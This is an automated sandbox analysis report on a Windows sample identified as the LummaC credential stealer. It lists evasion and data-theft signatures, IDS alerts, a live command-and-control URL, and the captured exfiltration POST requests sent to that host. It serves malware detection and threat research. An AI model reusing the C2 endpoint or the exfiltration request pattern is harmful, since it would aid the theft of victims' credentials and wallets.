Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1561841
MD5:6f817d33d580eb1b17c7159cd9e48c6e
SHA1:71bbb2928b40734b668e2c834f7b99f77400c8cf
SHA256:89bdff74d8814a4bf1441de3727d2cc526aa12574aea8bf45cc0441e3b6dd6d8
Tags:exeuser-Bitsight
Infos:

Detection

LummaC Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Query firmware table information (likely to detect VMs)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Detected potential crypto function
Entry point lies outside standard sections
Found inlined nop instructions (likely shell or obfuscated code)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 4416 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 6F817D33D580EB1B17C7159CD9E48C6E)
  • cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000003.2272712879.000000000120C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000000.00000003.2248717163.000000000120C000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000000.00000003.2276959339.00000000011EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 4 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T12:49:12.963924+010020283713Unknown Traffic192.168.2.649707172.67.162.84443TCP
              2024-11-24T12:49:14.967469+010020283713Unknown Traffic192.168.2.649709172.67.162.84443TCP
              2024-11-24T12:49:17.245766+010020283713Unknown Traffic192.168.2.649710172.67.162.84443TCP
              2024-11-24T12:49:19.487959+010020283713Unknown Traffic192.168.2.649712172.67.162.84443TCP
              2024-11-24T12:49:21.847284+010020283713Unknown Traffic192.168.2.649718172.67.162.84443TCP
              2024-11-24T12:49:24.528574+010020283713Unknown Traffic192.168.2.649724172.67.162.84443TCP
              2024-11-24T12:49:27.028571+010020283713Unknown Traffic192.168.2.649733172.67.162.84443TCP
              2024-11-24T12:49:31.156529+010020283713Unknown Traffic192.168.2.649749172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T12:49:13.663234+010020546531A Network Trojan was detected192.168.2.649707172.67.162.84443TCP
              2024-11-24T12:49:15.693662+010020546531A Network Trojan was detected192.168.2.649709172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T12:49:13.663234+010020498361A Network Trojan was detected192.168.2.649707172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T12:49:15.693662+010020498121A Network Trojan was detected192.168.2.649709172.67.162.84443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2024-11-24T12:49:18.145619+010020480941Malware Command and Control Activity Detected192.168.2.649710172.67.162.84443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus / Scanner detection for submitted sample
              Source: file.exeAvira: detected
              Found malware configuration
              Source: file.exe.4416.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": "https://property-imper.sbs/api", "Build Version": "LOGS11--LiveTraffi"}
              AI detected suspicious sample
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
              Machine Learning detection for sample
              Source: file.exeJoe Sandbox ML: detected
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49733 version: TLS 1.2
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\CEFJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\.ms-adJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolderJump to behavior
              Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+14h]0_2_00B298F0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, eax0_2_00B5B8E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00B5B8E0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx eax, byte ptr [esp+esi+000001E8h]0_2_00B2E0D8
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-65h]0_2_00B2E35B
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [eax], bl0_2_00B2CF05
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_00B5F8D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edi, eax0_2_00B5F8D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov ecx, eax0_2_00B2C02B
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [ebx], al0_2_00B40870
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then push eax0_2_00B5B860
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_00B5C040
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], C18BC4BAh0_2_00B5C040
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [edi+esi*8], 6DBC3610h0_2_00B5C040
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], 98D5A07Fh0_2_00B5C040
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edi, byte ptr [esp+edx+14h]0_2_00B2E970
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [esi], cx0_2_00B2EA38
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov byte ptr [esi], cl0_2_00B48CB0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00B25C90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov eax, ebp0_2_00B25C90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov edx, ecx0_2_00B2BC9D
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 4C697C35h0_2_00B5BCE0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx]0_2_00B2AD00
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [edi]0_2_00B45E90
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx edx, byte ptr [eax+ecx+00008F12h]0_2_00B277D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then mov word ptr [ebp+ebx*4+00h], ax0_2_00B277D0
              Source: C:\Users\user\Desktop\file.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax-58FA0F6Ch]0_2_00B60F60

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.6:49709 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.6:49707 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49707 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.6:49709 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.6:49710 -> 172.67.162.84:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: https://property-imper.sbs/api
              Source: Joe Sandbox ViewIP Address: 172.67.162.84 172.67.162.84
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49718 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49709 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49707 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49710 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49733 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49749 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49712 -> 172.67.162.84:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.6:49724 -> 172.67.162.84:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=YV731YY2NA1JES64O6HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12871Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=MYQD248BVFUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15063Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=RSTFWNBM120QDP41NWIUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19975Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z5FUY5BD5MYRERE7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1214Host: property-imper.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=Z3HINSN1XVJ6WEEBHUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 551754Host: property-imper.sbs
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficDNS traffic detected: DNS query: property-imper.sbs
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: property-imper.sbs
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: file.exe, 00000000.00000003.2249186192.0000000005ADA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: file.exe, 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315358058.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2357098669.0000000001192000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356842401.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272712879.00000000011D7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2358090011.0000000001192000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2298325612.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/
              Source: file.exe, 00000000.00000002.2358152673.00000000011E3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356842401.00000000011E1000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.00000000011D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/RM
              Source: file.exe, 00000000.00000003.2356614238.00000000011D8000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315818127.0000000001212000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2358004413.0000000001185000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api
              Source: file.exe, 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2276776306.00000000011F5000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2272712879.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/api$
              Source: file.exe, 00000000.00000002.2358257515.000000000121B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356597463.0000000001214000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apie
              Source: file.exe, 00000000.00000003.2248717163.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apin
              Source: file.exe, 00000000.00000002.2358257515.000000000121B000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356597463.0000000001214000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315358058.0000000001212000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315818127.0000000001212000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/apiw
              Source: file.exe, 00000000.00000003.2226439484.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315818127.00000000011EA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2315358058.00000000011EA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs/bNC
              Source: file.exe, 00000000.00000003.2356614238.0000000001171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/api
              Source: file.exe, 00000000.00000002.2358004413.0000000001171000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356614238.0000000001171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://property-imper.sbs:443/apiK
              Source: file.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: file.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: file.exe, 00000000.00000003.2250354989.0000000005ACC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: file.exe, 00000000.00000003.2204224671.0000000005AFA000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2204157810.0000000005AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: file.exe, 00000000.00000003.2250301205.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: file.exe, 00000000.00000003.2250301205.0000000005AD7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: file.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: file.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: file.exe, 00000000.00000003.2250013161.0000000005BDD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: file.exe, 00000000.00000003.2250301205.0000000005ACE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
              Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
              Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49707 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49709 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49718 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.67.162.84:443 -> 192.168.2.6:49733 version: TLS 1.2

              System Summary

              barindex
              PE file contains section with special chars
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_011DB9F80_3_011DB9F8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B298F00_2_00B298F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5B8E00_2_00B5B8E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2E0D80_2_00B2E0D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B590300_2_00B59030
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B289A00_2_00B289A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B60C800_2_00B60C80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B615800_2_00B61580
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B395300_2_00B39530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B43D700_2_00B43D70
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B417900_2_00B41790
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B2CF050_2_00B2CF05
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B487700_2_00B48770
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00C0D8DA0_2_00C0D8DA
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B5F8D00_2_00B5F8D0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B8E01E0_2_00B8E01E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00B408700_2_00B40870
